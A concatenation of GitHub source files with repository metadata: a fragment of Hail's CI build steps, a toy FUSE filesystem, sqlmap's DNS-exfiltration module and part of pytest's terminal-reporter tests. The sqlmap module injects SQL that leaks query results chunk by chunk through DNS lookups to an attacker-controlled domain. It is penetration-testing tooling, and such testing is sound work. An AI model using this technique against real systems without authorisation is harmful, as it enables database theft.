                    timeout = w.get('timeout', 60)
                    if resource_type == 'statefulset':
                        wait_cmd = f'kubectl -n {self.namespace} wait --timeout=1h --for=condition=ready pods --selector=app={name}'
                    else:
                        assert resource_type == 'deployment'
                        wait_cmd = f'kubectl -n {self.namespace} wait --timeout=1h --for=condition=available deployment {name}'

                    script += f'''
set +e
kubectl -n {self.namespace} rollout status --timeout=1h {resource_type} {name} && \
{wait_cmd}
EC=$?
kubectl -n {self.namespace} logs --tail=999999 -l app={name} --all-containers=true | {pretty_print_log}
set -e
(exit $EC)
'''
                else:
                    assert w['kind'] == 'Pod', w['kind']
                    assert w['for'] == 'completed', w['for']
                    timeout = w.get('timeout', 300)
                    # Wait for scheduling, then poll for completion via the
                    # wait-for.py helper with the configured timeout.
                    script += f'''
set +e
kubectl -n {self.namespace} wait --timeout=1h pod --for=condition=podscheduled {name} \
&& python3 wait-for.py {timeout} {self.namespace} Pod {name}
EC=$?
kubectl -n {self.namespace} logs --tail=999999 {name} --all-containers=true | {pretty_print_log}
set -e
(exit $EC)
'''

        script += '''
date
'''

        attrs = {'name': self.name}
        if self.link is not None:
            # Links surface as a clickable domain in the CI UI.
            attrs['link'] = ','.join(self.link)
            attrs['domain'] = f'{self.namespace}.internal.{DOMAIN}'

        self.job = batch.create_job(CI_UTILS_IMAGE,
                                    command=['bash', '-c', script],
                                    attributes=attrs,
                                    # FIXME configuration
                                    service_account={
                                        'namespace': BATCH_PODS_NAMESPACE,
                                        'name': 'ci-agent'
                                    },
                                    parents=self.deps_parents(),
                                    network='private')

    def cleanup(self, batch, scope, parents):  # pylint: disable=unused-argument
        """Always-run job that dumps the logs of everything we waited on."""
        if self.wait:
            script = ''
            for w in self.wait:
                name = w['name']
                if w['kind'] == 'Deployment':
                    script += f'kubectl -n {self.namespace} logs --tail=999999 -l app={name} --all-containers=true | {pretty_print_log}\n'
                elif w['kind'] == 'Service':
                    assert w['for'] == 'alive', w['for']
                    script += f'kubectl -n {self.namespace} logs --tail=999999 -l app={name} --all-containers=true | {pretty_print_log}\n'
                else:
                    assert w['kind'] == 'Pod', w['kind']
                    script += f'kubectl -n {self.namespace} logs --tail=999999 {name} --all-containers=true | {pretty_print_log}\n'
            script += 'date\n'
            self.job = batch.create_job(CI_UTILS_IMAGE,
                                        command=['bash', '-c', script],
                                        attributes={'name': self.name + '_logs'},
                                        # FIXME configuration
                                        service_account={
                                            'namespace': BATCH_PODS_NAMESPACE,
                                            'name': 'ci-agent'
                                        },
                                        parents=parents,
                                        always_run=True,
                                        network='private')
class CreateDatabaseStep(Step):
    """Build step that provisions a MySQL database with admin/user accounts
    (via create_database.py) and cleans them up after test runs."""

    def __init__(self, params, database_name, namespace, migrations, shutdowns, inputs):
        super().__init__(params)

        config = self.input_config(params.code, params.scope)

        # FIXME validate
        self.database_name = database_name
        self.namespace = get_namespace(namespace, config)
        self.migrations = migrations

        # Resolve the namespace of every service that must be shut down
        # before migrations run.
        for s in shutdowns:
            s['namespace'] = get_namespace(s['namespace'], config)
        self.shutdowns = shutdowns

        self.inputs = inputs
        self.create_passwords_job = None
        self.create_database_job = None
        self.cleanup_job = None

        if params.scope == 'dev':
            self.database_server_config_namespace = params.code.namespace
        else:
            self.database_server_config_namespace = DEFAULT_NAMESPACE

        # Test deployments and dev scope reuse an existing database rather
        # than creating a fresh one.
        self.cant_create_database = is_test_deployment or params.scope == 'dev'

        # MySQL user name can be up to 16 characters long before MySQL 5.7.8 (32 after)
        if self.cant_create_database:
            self._name = None
            self.admin_username = None
            self.user_username = None
        elif params.scope == 'deploy':
            self._name = database_name
            self.admin_username = f'{database_name}-admin'
            self.user_username = f'{database_name}-user'
        else:
            assert params.scope == 'test'
            # Per-run database and random usernames.
            self._name = f'{params.code.short_str()}-{database_name}-{self.token}'
            self.admin_username = generate_token()
            self.user_username = generate_token()

        self.admin_password_file = f'/io/{self.admin_username}.pwd'
        self.user_password_file = f'/io/{self.user_username}.pwd'

        self.admin_secret_name = f'sql-{self.database_name}-admin-config'
        self.user_secret_name = f'sql-{self.database_name}-user-config'

    def wrapped_job(self):
        # cleanup() supersedes the build jobs; otherwise report whichever
        # build jobs exist (password creation precedes database creation).
        if self.cleanup_job:
            return [self.cleanup_job]
        if self.create_passwords_job:
            assert self.create_database_job is not None
            return [self.create_passwords_job, self.create_database_job]
        if self.create_database_job:
            return [self.create_database_job]
        return []

    @staticmethod
    def from_json(params):
        """Construct the step from its JSON build-configuration entry."""
        json = params.json
        return CreateDatabaseStep(params,
                                  json['databaseName'],
                                  json['namespace'],
                                  json['migrations'],
                                  json.get('shutdowns', []),
                                  json.get('inputs'))

    def config(self, scope):  # pylint: disable=unused-argument
        # Secret names are exported so dependent steps can mount credentials.
        return {
            'token': self.token,
            'admin_secret_name': self.admin_secret_name,
            'user_secret_name': self.user_secret_name
        }

    def build(self, batch, code, scope):  # pylint: disable=unused-argument
        # Everything create_database.py needs, passed as JSON on its stdin.
        create_database_config = {
            'namespace': self.namespace,
            'scope': scope,
            'database_name': self.database_name,
            '_name': self._name,
            'admin_username': self.admin_username,
            'user_username': self.user_username,
            'admin_password_file': self.admin_password_file,
            'user_password_file': self.user_password_file,
            'cant_create_database': self.cant_create_database,
            'migrations': self.migrations,
            'shutdowns': self.shutdowns
        }

        # Generate two random 16-character alphanumeric passwords.
        create_passwords_script = f'''
set -ex
LC_ALL=C tr -dc '[:alnum:]' </dev/urandom | head -c 16 > {self.admin_password_file}
LC_ALL=C tr -dc '[:alnum:]' </dev/urandom | head -c 16 > {self.user_password_file}
'''

        create_database_script = f'''
set -ex
create_database_config={shq(json.dumps(create_database_config, indent=2))}
python3 create_database.py <<EOF
$create_database_config
EOF
'''

        input_files = []
        if self.inputs:
            for i in self.inputs:
                input_files.append((f'gs://{BUCKET}/build/{batch.attributes["token"]}{i["from"]}', i["to"]))

        if not self.cant_create_database:
            # NOTE(review): the password files start with '/io/', so these
            # gs:// keys contain a double slash after the token; writer and
            # reader use the same string, so it is self-consistent — confirm
            # before "fixing".
            password_files_input = [
                (f'gs://{BUCKET}/build/{batch.attributes["token"]}/{self.admin_password_file}', self.admin_password_file),
                (f'gs://{BUCKET}/build/{batch.attributes["token"]}/{self.user_password_file}', self.user_password_file)]
            input_files.extend(password_files_input)

            self.create_passwords_job = batch.create_job(
                CI_UTILS_IMAGE,
                command=['bash', '-c', create_passwords_script],
                attributes={'name': self.name + "_create_passwords"},
                # Upload the generated password files for the next job.
                output_files=[(x[1], x[0]) for x in password_files_input],
                parents=self.deps_parents())

        self.create_database_job = batch.create_job(
            CI_UTILS_IMAGE,
            command=['bash', '-c', create_database_script],
            attributes={'name': self.name},
            secrets=[{
                'namespace': self.database_server_config_namespace,
                'name': 'database-server-config',
                'mount_path': '/sql-config'
            }],
            service_account={
                'namespace': BATCH_PODS_NAMESPACE,
                'name': 'ci-agent'
            },
            input_files=input_files,
            parents=[self.create_passwords_job] if self.create_passwords_job else self.deps_parents(),
            network='private')

    def cleanup(self, batch, scope, parents):
        """Drop the per-run database and its users; a no-op whenever the
        database was preexisting (deploy/dev/test-deployment)."""
        if scope in ['deploy', 'dev'] or self.cant_create_database:
            return

        cleanup_script = f'''
set -ex
commands=$(mktemp)
cat >$commands <<EOF
DROP DATABASE IF EXISTS \\`{self._name}\\`;
DROP USER IF EXISTS '{self.admin_username}';
DROP USER IF EXISTS '{self.user_username}';
EOF
until mysql --defaults-extra-file=/sql-config/sql-config.cnf <$commands
do
echo 'failed, will sleep 2 and retry'
sleep 2
done
'''
        self.cleanup_job = batch.create_job(
            CI_UTILS_IMAGE,
            command=['bash', '-c', cleanup_script],
            attributes={'name': f'cleanup_{self.name}'},
            secrets=[{
                'namespace': self.database_server_config_namespace,
                'name': 'database-server-config',
                'mount_path': '/sql-config'
            }],
            service_account={
                'namespace': BATCH_PODS_NAMESPACE,
                'name': 'ci-agent'
            },
            parents=parents,
            always_run=True,
            network='private')
| {
"content_hash": "51227d223954ddc980b907bd6aeae300",
"timestamp": "",
"source": "github",
"line_count": 1011,
"max_line_length": 162,
"avg_line_length": 34.196834817012856,
"alnum_prop": 0.532091516501316,
"repo_name": "cseed/hail",
"id": "516853316b22a4ee2b76ae13990bb6ccb2ec7428",
"size": "34573",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ci/ci/build.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7729"
},
{
"name": "C",
"bytes": "289"
},
{
"name": "C++",
"bytes": "170210"
},
{
"name": "CSS",
"bytes": "20423"
},
{
"name": "Dockerfile",
"bytes": "7426"
},
{
"name": "HTML",
"bytes": "43106"
},
{
"name": "Java",
"bytes": "22564"
},
{
"name": "JavaScript",
"bytes": "730"
},
{
"name": "Jupyter Notebook",
"bytes": "162397"
},
{
"name": "Makefile",
"bytes": "58348"
},
{
"name": "PLpgSQL",
"bytes": "23163"
},
{
"name": "Python",
"bytes": "3477764"
},
{
"name": "R",
"bytes": "3038"
},
{
"name": "Scala",
"bytes": "3496240"
},
{
"name": "Shell",
"bytes": "41254"
},
{
"name": "TSQL",
"bytes": "10385"
},
{
"name": "TeX",
"bytes": "7125"
},
{
"name": "XSLT",
"bytes": "9787"
}
],
"symlink_target": ""
} |
"""
TestFS
An ongoing attempt at learning by doing with Python-FUSE
Copyright (c) 2012 Sean Harlow (firstname) at (firstname)(lastname) dot info
Released under the BSD license, see COPYING file for info.
"""
import errno, fuse, stat, time
import logging as log
# Setup FUSE
fuse.fuse_python_api = (0, 2)
# Setup logging
log.basicConfig(level=log.DEBUG)
# Static filesystem content: every directory, every file, and the text
# that every file claims to contain.
directories = ['/', '/testdir1', '/testdir2', '/testdir3', '/testdir1/testsubdir']
files = ['/file1.txt', '/file2.txt', '/testdir2/file3.txt']
dummytext = 'This is a dummy file in a TestFS filesystem. All files on the system will return this text.'
class EmptyStat(fuse.Stat):
    """A stat result with every field zeroed, except that the access time
    is the moment of construction."""

    def __init__(self):
        # Zero out every standard stat field ...
        for field in ('st_mode', 'st_ino', 'st_dev', 'st_nlink',
                      'st_uid', 'st_gid', 'st_size', 'st_mtime', 'st_ctime'):
            setattr(self, field, 0)
        # ... and report "now" as the access time.
        self.st_atime = int(time.time())
class TestFS(fuse.Fuse):
    """A read-only in-memory filesystem serving the dummy entries declared
    in the module-level `directories`/`files` lists."""

    def __init__(self, *args, **kw):
        log.info('Initializing FUSE')
        fuse.Fuse.__init__(self, *args, **kw)
        log.info('Initializing TestFS')

    def getattr(self, path):
        """Return stat info for `path`, or -ENOENT if it does not exist."""
        log.info('getattr %s', path)
        st = EmptyStat()
        if path in directories:
            log.debug('%s is a directory', path)
            st.st_mode = stat.S_IFDIR | 0o755
            st.st_nlink = 2
        elif path in files:
            log.debug('%s is a file', path)
            st.st_mode = stat.S_IFREG | 0o644
            st.st_nlink = 1
            st.st_size = len(dummytext)
        else:
            # Previously this fell through and returned a zeroed stat,
            # making every nonexistent path look like an empty entry
            # (`errno` was imported but never used — this was the intent).
            return -errno.ENOENT
        return st

    def readdir(self, path, offset):
        """Yield the entries directly contained in directory `path`."""
        log.info('readdir %s, %i', path, offset)
        yield fuse.Direntry('.')
        yield fuse.Direntry('..')
        # An entry belongs in this listing iff its parent directory is
        # exactly `path`.  The old component-count comparison (joined with
        # bitwise `&`) only worked for the root directory: subdirectory
        # listings yielded nothing, and nested matches would have kept a
        # leading '/'.
        prefix = path if path.endswith('/') else path + '/'
        entrylist = []
        for full in files + directories:
            if full != path and full.startswith(prefix):
                rest = full[len(prefix):]
                if rest and '/' not in rest:
                    log.debug('Matched entry %s', full)
                    entrylist.append(rest)
        for entry in sorted(entrylist):
            yield fuse.Direntry(entry)
if __name__ == '__main__':
    # Parse the standard FUSE command-line options (errex=1: exit with
    # status 1 on a bad command line) before entering the FUSE main loop.
    fs = TestFS()
    fs.parse(errex=1)
fs.main() | {
"content_hash": "898daa6efda69dfe13469eac5f89094c",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 111,
"avg_line_length": 28.329268292682926,
"alnum_prop": 0.6289281102023245,
"repo_name": "wolrah/TestFS",
"id": "13cf1ad4cb97b25f30ddfb36cbb8d1c2440fd576",
"size": "2346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "testfs.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "3114"
}
],
"symlink_target": ""
} |
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
import time
from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToStdout
from lib.core.common import decodeHexValue
from lib.core.common import extractRegexResult
from lib.core.common import getSQLSnippet
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.settings import DNS_BOUNDARIES_ALPHABET
from lib.core.settings import MAX_DNS_LABEL
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
def dnsUse(payload, expression):
    """
    Retrieve the output of a SQL query taking advantage of the DNS
    resolution mechanism by making request back to attacker's machine.
    """

    start = time.time()

    retVal = None
    count = 0
    offset = 1

    # DNS exfiltration is only implemented for these four backends.
    if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
        output = hashDBRetrieve(expression, checkConf=True)

        # Discard resumed partial values, and force a fresh run when the DNS
        # technique has not been tested yet.  Precedence note: this binds as
        # (output and MARKER in output) or (kb.dnsTest is None).
        if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
            output = None

        if output is None:
            kb.dnsMode = True

            # Fetch the value chunk by chunk; each round asks the DBMS to
            # resolve <prefix>.<hex-encoded-chunk>.<suffix>.<dnsName>.
            while True:
                count += 1

                # Random markers delimiting the payload inside the DNS name.
                prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2))
                # Hex encoding inflates the data, so only a fraction of the
                # maximum DNS label length carries payload per request.
                chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2

                _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
                nulledCastedField = agent.nullAndCastField(fieldToCastStr)
                extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0)
                if extendedField != fieldToCastStr:  # e.g. MIN(surname)
                    nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField)
                    fieldToCastStr = extendedField
                # Select the current chunk and hex-encode it.
                nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
                nulledCastedField = agent.hexConvertField(nulledCastedField)
                expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
                expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName)
                expressionUnescaped = unescaper.escape(expressionRequest)

                if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
                    # Stacked query terminated by a DBMS comment.
                    query = agent.prefixQuery("; %s" % expressionUnescaped)
                    query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query)
                    forgedPayload = agent.payload(newValue=query)
                else:
                    forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))

                Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)

                # Ask the embedded DNS server for a matching resolution
                # request (a custom pop(prefix, suffix), not dict.pop).
                _ = conf.dnsServer.pop(prefix, suffix)

                if _:
                    _ = extractRegexResult("%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I)
                    _ = decodeHexValue(_)
                    output = (output or "") + _
                    offset += len(_)

                    # A short chunk means the value has been fully read.
                    if len(_) < chunk_length:
                        break
                else:
                    break

            output = decodeHexValue(output) if conf.hexConvert else output

            kb.dnsMode = False

        if output is not None:
            retVal = output

            if kb.dnsTest is not None:
                dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))

                if count > 0:
                    hashDBWrite(expression, output)

        if not kb.bruteMode:
            debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start))
            logger.debug(debugMsg)
    elif conf.dnsName:
        warnMsg = "DNS data exfiltration method through SQL injection "
        warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms()
        singleTimeWarnMessage(warnMsg)

    return safecharencode(retVal) if kb.safeCharEncode else retVal
| {
"content_hash": "4033bdb9e6973ee814fb68d3cf9e710c",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 170,
"avg_line_length": 42.41025641025641,
"alnum_prop": 0.6473196291817815,
"repo_name": "glaudsonml/kurgan-ai",
"id": "1e4216ef342fb1426415dca6acfad41e557126d3",
"size": "4985",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/sqlmap/lib/techniques/dns/use.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "122729"
},
{
"name": "HTML",
"bytes": "48894"
},
{
"name": "JavaScript",
"bytes": "1589671"
},
{
"name": "PHP",
"bytes": "72064"
},
{
"name": "Python",
"bytes": "211839"
},
{
"name": "Shell",
"bytes": "5722"
}
],
"symlink_target": ""
} |
"""Terminal reporting of the full testing process."""
import collections
import os
import sys
import textwrap
from io import StringIO
from pathlib import Path
from types import SimpleNamespace
from typing import cast
from typing import Dict
from typing import List
from typing import Tuple
import pluggy
import _pytest.config
import _pytest.terminal
import pytest
from _pytest._io.wcwidth import wcswidth
from _pytest.config import Config
from _pytest.config import ExitCode
from _pytest.monkeypatch import MonkeyPatch
from _pytest.pytester import Pytester
from _pytest.reports import BaseReport
from _pytest.reports import CollectReport
from _pytest.reports import TestReport
from _pytest.terminal import _folded_skips
from _pytest.terminal import _format_trimmed
from _pytest.terminal import _get_line_with_reprcrash_message
from _pytest.terminal import _get_raw_skip_reason
from _pytest.terminal import _plugin_nameversions
from _pytest.terminal import getreportopt
from _pytest.terminal import TerminalReporter
# Minimal stand-in for pkg_resources-style distribution metadata.
DistInfo = collections.namedtuple("DistInfo", ["project_name", "version"])

# Translation table escaping fnmatch metacharacters "[" and "]".
TRANS_FNMATCH = str.maketrans({"[": "[[]", "]": "[]]"})
class Option:
    """Bundles a verbosity level with the CLI flags that express it."""

    def __init__(self, verbosity=0):
        self.verbosity = verbosity

    @property
    def args(self):
        """Command-line arguments selecting this verbosity level."""
        return ["--verbosity=%d" % self.verbosity]
# Run each test that uses this fixture under the default, verbose and
# quiet reporters.
@pytest.fixture(
    params=[Option(verbosity=0), Option(verbosity=1), Option(verbosity=-1)],
    ids=["default", "verbose", "quiet"],
)
def option(request):
    """Parametrized fixture yielding one `Option` per verbosity level."""
    return request.param
@pytest.mark.parametrize(
    "input,expected",
    [
        ([DistInfo(project_name="test", version=1)], ["test-1"]),
        ([DistInfo(project_name="pytest-test", version=1)], ["test-1"]),
        (
            [
                DistInfo(project_name="test", version=1),
                DistInfo(project_name="test", version=1),
            ],
            ["test-1"],
        ),
    ],
    ids=["normal", "prefix-strip", "deduplicate"],
)
def test_plugin_nameversion(input, expected):
    """_plugin_nameversions strips the `pytest-` prefix and deduplicates."""
    pluginlist = [(None, x) for x in input]
    result = _plugin_nameversions(pluginlist)
    assert result == expected
class TestTerminal:
    def test_pass_skip_fail(self, pytester: Pytester, option) -> None:
        """One passing, one skipped and one failing test render correctly
        at every verbosity level."""
        pytester.makepyfile(
            """
            import pytest
            def test_ok():
                pass
            def test_skip():
                pytest.skip("xx")
            def test_func():
                assert 0
            """
        )
        result = pytester.runpytest(*option.args)
        if option.verbosity > 0:
            result.stdout.fnmatch_lines(
                [
                    "*test_pass_skip_fail.py::test_ok PASS*",
                    "*test_pass_skip_fail.py::test_skip SKIP*",
                    "*test_pass_skip_fail.py::test_func FAIL*",
                ]
            )
        elif option.verbosity == 0:
            result.stdout.fnmatch_lines(["*test_pass_skip_fail.py .sF*"])
        else:
            result.stdout.fnmatch_lines([".sF*"])
        # The failure traceback is shown regardless of verbosity.
        result.stdout.fnmatch_lines(
            [" def test_func():", "> assert 0", "E assert 0"]
        )
    def test_internalerror(self, pytester: Pytester, linecomp) -> None:
        """An internal error is reported with the INTERNALERROR> prefix."""
        modcol = pytester.getmodulecol("def test_one(): pass")
        rep = TerminalReporter(modcol.config, file=linecomp.stringio)
        with pytest.raises(ValueError) as excinfo:
            raise ValueError("hello")
        rep.pytest_internalerror(excinfo.getrepr())
        linecomp.assert_contains_lines(["INTERNALERROR> *ValueError*hello*"])
    def test_writeline(self, pytester: Pytester, linecomp) -> None:
        """write_line starts on a fresh line after a fspath progress dot."""
        modcol = pytester.getmodulecol("def test_one(): pass")
        rep = TerminalReporter(modcol.config, file=linecomp.stringio)
        rep.write_fspath_result(modcol.nodeid, ".")
        rep.write_line("hello world")
        lines = linecomp.stringio.getvalue().split("\n")
        assert not lines[0]
        assert lines[1].endswith(modcol.name + " .")
        assert lines[2] == "hello world"
    def test_show_runtest_logstart(self, pytester: Pytester, linecomp) -> None:
        """The pytest_runtest_logstart hook prints the test's file location."""
        item = pytester.getitem("def test_func(): pass")
        tr = TerminalReporter(item.config, file=linecomp.stringio)
        item.config.pluginmanager.register(tr)
        location = item.reportinfo()
        tr.config.hook.pytest_runtest_logstart(
            nodeid=item.nodeid, location=location, fspath=str(item.path)
        )
        linecomp.assert_contains_lines(["*test_show_runtest_logstart.py*"])
    def test_runtest_location_shown_before_test_starts(
        self, pytester: Pytester
    ) -> None:
        """The test's location is printed before the test finishes: the
        child is killed while the test is still sleeping."""
        pytester.makepyfile(
            """
            def test_1():
                import time
                time.sleep(20)
            """
        )
        child = pytester.spawn_pytest("")
        child.expect(".*test_runtest_location.*py")
        child.sendeof()
        child.kill(15)
    def test_report_collect_after_half_a_second(
        self, pytester: Pytester, monkeypatch: MonkeyPatch
    ) -> None:
        """Test for "collecting" being updated after 0.5s.

        REPORT_COLLECTING_RESOLUTION is forced to 0 inside the collected
        file so the progress line refreshes for every item.
        """
        pytester.makepyfile(
            **{
                "test1.py": """
                import _pytest.terminal
                _pytest.terminal.REPORT_COLLECTING_RESOLUTION = 0
                def test_1():
                    pass
                """,
                "test2.py": "def test_2(): pass",
            }
        )
        # Explicitly test colored output.
        monkeypatch.setenv("PY_COLORS", "1")
        child = pytester.spawn_pytest("-v test1.py test2.py")
        child.expect(r"collecting \.\.\.")
        child.expect(r"collecting 1 item")
        child.expect(r"collecting 2 items")
        child.expect(r"collected 2 items")
        rest = child.read().decode("utf8")
        # ANSI green/bold markup around "2 passed".
        assert "= \x1b[32m\x1b[1m2 passed\x1b[0m\x1b[32m in" in rest
    def test_itemreport_subclasses_show_subclassed_file(
        self, pytester: Pytester
    ) -> None:
        """Tests inherited from another file are annotated with
        `<- <defining file>` in verbose mode, and failure tracebacks point
        at the defining file."""
        pytester.makepyfile(
            **{
                "tests/test_p1": """
                class BaseTests(object):
                    fail = False
                    def test_p1(self):
                        if self.fail: assert 0
                """,
                "tests/test_p2": """
                from test_p1 import BaseTests
                class TestMore(BaseTests): pass
                """,
                "tests/test_p3.py": """
                from test_p1 import BaseTests
                BaseTests.fail = True
                class TestMore(BaseTests): pass
                """,
            }
        )
        result = pytester.runpytest("tests/test_p2.py", "--rootdir=tests")
        result.stdout.fnmatch_lines(["tests/test_p2.py .*", "=* 1 passed in *"])
        result = pytester.runpytest("-vv", "-rA", "tests/test_p2.py", "--rootdir=tests")
        result.stdout.fnmatch_lines(
            [
                "tests/test_p2.py::TestMore::test_p1 <- test_p1.py PASSED *",
                "*= short test summary info =*",
                "PASSED tests/test_p2.py::TestMore::test_p1",
            ]
        )
        result = pytester.runpytest("-vv", "-rA", "tests/test_p3.py", "--rootdir=tests")
        result.stdout.fnmatch_lines(
            [
                "tests/test_p3.py::TestMore::test_p1 <- test_p1.py FAILED *",
                "*_ TestMore.test_p1 _*",
                " def test_p1(self):",
                "> if self.fail: assert 0",
                "E assert 0",
                "",
                "tests/test_p1.py:5: AssertionError",
                "*= short test summary info =*",
                "FAILED tests/test_p3.py::TestMore::test_p1 - assert 0",
                "*= 1 failed in *",
            ]
        )
    def test_itemreport_directclasses_not_shown_as_subclasses(
        self, pytester: Pytester
    ) -> None:
        """Tests defined directly on a class get no `<- file` annotation."""
        a = pytester.mkpydir("a123")
        a.joinpath("test_hello123.py").write_text(
            textwrap.dedent(
                """\
                class TestClass(object):
                    def test_method(self):
                        pass
                """
            )
        )
        result = pytester.runpytest("-vv")
        assert result.ret == 0
        result.stdout.fnmatch_lines(["*a123/test_hello123.py*PASS*"])
        result.stdout.no_fnmatch_line("* <- *")
    @pytest.mark.parametrize("fulltrace", ("", "--fulltrace"))
    def test_keyboard_interrupt(self, pytester: Pytester, fulltrace) -> None:
        """KeyboardInterrupt reports the failing assertion and either the
        full or a shortened traceback depending on --fulltrace."""
        pytester.makepyfile(
            """
            def test_foobar():
                assert 0
            def test_spamegg():
                import py; pytest.skip('skip me please!')
            def test_interrupt_me():
                raise KeyboardInterrupt # simulating the user
            """
        )
        result = pytester.runpytest(fulltrace, no_reraise_ctrlc=True)
        result.stdout.fnmatch_lines(
            [
                " def test_foobar():",
                "> assert 0",
                "E assert 0",
                "*_keyboard_interrupt.py:6: KeyboardInterrupt*",
            ]
        )
        if fulltrace:
            result.stdout.fnmatch_lines(
                ["*raise KeyboardInterrupt # simulating the user*"]
            )
        else:
            result.stdout.fnmatch_lines(
                ["(to show a full traceback on KeyboardInterrupt use --full-trace)"]
            )
        result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
    def test_keyboard_in_sessionstart(self, pytester: Pytester) -> None:
        """KeyboardInterrupt raised during session start exits with code 2."""
        pytester.makeconftest(
            """
            def pytest_sessionstart():
                raise KeyboardInterrupt
            """
        )
        pytester.makepyfile(
            """
            def test_foobar():
                pass
            """
        )
        result = pytester.runpytest(no_reraise_ctrlc=True)
        assert result.ret == 2
        result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
def test_collect_single_item(self, pytester: Pytester) -> None:
    """Use singular 'item' when reporting a single test item."""
    pytester.makepyfile(
        """
        def test_foobar():
            pass
        """
    )
    # Note: "item", not "items".
    pytester.runpytest().stdout.fnmatch_lines(["collected 1 item"])
def test_rewrite(self, pytester: Pytester, monkeypatch) -> None:
    """TerminalReporter.rewrite(erase=True) returns to column 0 and pads
    with spaces so the previous, longer line is fully overwritten."""
    config = pytester.parseconfig()
    buf = StringIO()
    # Pretend we are attached to a terminal so rewrites are emitted.
    monkeypatch.setattr(buf, "isatty", lambda *args: True)
    reporter = TerminalReporter(config, buf)
    reporter._tw.fullwidth = 10
    reporter.write("hello")
    reporter.rewrite("hey", erase=True)
    # "hey" plus 6 spaces of padding erases the tail of "hello" within
    # the 10-column width.
    assert buf.getvalue() == "hello" + "\r" + "hey" + (6 * " ")
def test_report_teststatus_explicit_markup(
    self, monkeypatch: MonkeyPatch, pytester: Pytester, color_mapping
) -> None:
    """Test that TerminalReporter handles markup explicitly provided by
    a pytest_report_teststatus hook."""
    monkeypatch.setenv("PY_COLORS", "1")
    pytester.makeconftest(
        """
        def pytest_report_teststatus(report):
            return 'foo', 'F', ('FOO', {'red': True})
        """
    )
    pytester.makepyfile(
        """
        def test_foobar():
            pass
        """
    )
    expected = color_mapping.format_for_fnmatch(["*{red}FOO{reset}*"])
    result = pytester.runpytest("-v")
    result.stdout.fnmatch_lines(expected)
def test_verbose_skip_reason(self, pytester: Pytester) -> None:
    # -v shows the skip/xfail reason inline after the status word
    # (truncated when too long for the line); -vv shows the full reason.
    pytester.makepyfile(
        """
        import pytest
        @pytest.mark.skip(reason="123")
        def test_1():
            pass
        @pytest.mark.xfail(reason="456")
        def test_2():
            pass
        @pytest.mark.xfail(reason="789")
        def test_3():
            assert False
        @pytest.mark.xfail(reason="")
        def test_4():
            assert False
        @pytest.mark.skip
        def test_5():
            pass
        @pytest.mark.xfail
        def test_6():
            pass
        def test_7():
            pytest.skip()
        def test_8():
            pytest.skip("888 is great")
        def test_9():
            pytest.xfail()
        def test_10():
            pytest.xfail("It's 🕙 o'clock")
        @pytest.mark.skip(
            reason="cannot do foobar because baz is missing due to I don't know what"
        )
        def test_long_skip():
            pass
        @pytest.mark.xfail(
            reason="cannot do foobar because baz is missing due to I don't know what"
        )
        def test_long_xfail():
            print(1 / 0)
        """
    )
    # Lines common to -v and -vv: marker reason in parentheses, bare
    # skip/xfail without reason shown without parentheses.
    common_output = [
        "test_verbose_skip_reason.py::test_1 SKIPPED (123) *",
        "test_verbose_skip_reason.py::test_2 XPASS (456) *",
        "test_verbose_skip_reason.py::test_3 XFAIL (789) *",
        "test_verbose_skip_reason.py::test_4 XFAIL *",
        "test_verbose_skip_reason.py::test_5 SKIPPED (unconditional skip) *",
        "test_verbose_skip_reason.py::test_6 XPASS *",
        "test_verbose_skip_reason.py::test_7 SKIPPED *",
        "test_verbose_skip_reason.py::test_8 SKIPPED (888 is great) *",
        "test_verbose_skip_reason.py::test_9 XFAIL *",
        "test_verbose_skip_reason.py::test_10 XFAIL (It's 🕙 o'clock) *",
    ]
